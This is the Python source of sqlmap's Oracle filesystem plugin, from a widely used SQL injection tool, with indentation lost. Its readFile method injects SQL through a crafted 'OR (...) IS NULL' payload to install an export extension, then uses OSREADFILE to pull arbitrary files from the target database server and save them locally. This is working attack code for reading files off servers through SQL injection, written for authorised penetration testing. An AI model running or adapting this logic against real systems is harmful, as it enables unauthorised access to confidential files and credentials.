sqlmap/plugins/dbms/oracle/filesystem.py

58 lines
2.1 KiB
Python

#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.agent import agent
from lib.core.common import dataToOutFile
from lib.core.common import decodeDbmsHexValue
from lib.core.common import getSQLSnippet
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from lib.request.connect import Connect as Request
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def readFile(self, remoteFile):
localFilePaths = []
snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension")
for query in snippet.split("\n"):
query = query.strip()
query = agent.prefixQuery("OR (%s) IS NULL" % query)
query = agent.suffixQuery(query, trimEmpty=False)
payload = agent.payload(newValue=query)
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
for remoteFile in remoteFile.split(','):
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
kb.fileReadMode = True
fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
kb.fileReadMode = False
if fileContent is not None:
fileContent = decodeDbmsHexValue(fileContent, True)
if fileContent:
localFilePath = dataToOutFile(remoteFile, fileContent)
localFilePaths.append(localFilePath)
else:
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "File system write access not yet implemented for "
errMsg += "Oracle"
raise SqlmapUnsupportedFeatureException(errMsg)